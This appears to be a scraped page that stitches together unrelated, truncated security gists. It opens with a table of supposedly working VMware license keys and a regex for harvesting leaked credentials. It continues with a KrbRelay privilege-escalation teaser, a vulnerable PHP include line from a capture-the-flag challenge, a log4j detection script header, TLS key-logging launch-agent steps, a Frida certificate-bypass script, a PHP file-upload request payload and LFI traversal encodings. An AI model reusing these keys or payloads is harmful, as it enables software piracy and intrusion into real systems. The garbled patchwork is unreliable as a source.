Free VMware license keys, they should work. It works for all cores on your host system(ESXi).
Key | Tested |
---|---|
4F282-0MLD2-M8869-T89G0-CF240 | ✅ |
0F41K-0MJ4H-M88U1-0C3N0-0A214 | ✅ |
Key | Tested |
---|
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
#! /usr/bin/env python3 | |
''' | |
Needs Requests (pip3 install requests) | |
Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
mkdir -p ~/Library/LaunchAgents
tlskeylogger.plist
at ~/Library/LaunchAgents/tlskeylogger.plist
launchctl load ~/Library/LaunchAgents/tlskeylogger.plist
, so it will load on the next restartlaunchctl start ~/Library/LaunchAgents/tlskeylogger.plist
, so it will load the environment variable immediately~/.tlskeyfile
via tail -f ~/.tlskeyfile
NB: This may be hit or miss and many apps do not respect the env var.
/* Android Network Security Config bypass script | |
by Maurizio Siddu | |
Run with: | |
frida -U -f [APP_ID] -l frida_netsecconfig_bypass.js --no-pause | |
*/ | |
Java.perform(function(){ | |
console.log(''); | |
console.log('======'); |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
14 apple.com | |
40 vk.com | |
44 github.com | |
49 tumblr.com | |
55 dropbox.com | |
85 medium.com | |
87 paypal.com | |
92 icloud.com | |
100 booking.com | |
112 weebly.com |
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt | |
Traversal encoding: | |
=================== | |
../ | |
..\ | |
..\/ | |
%2e%2e%2f | |
%252e%252e%252f | |
%c0%ae%c0%ae%c0%af |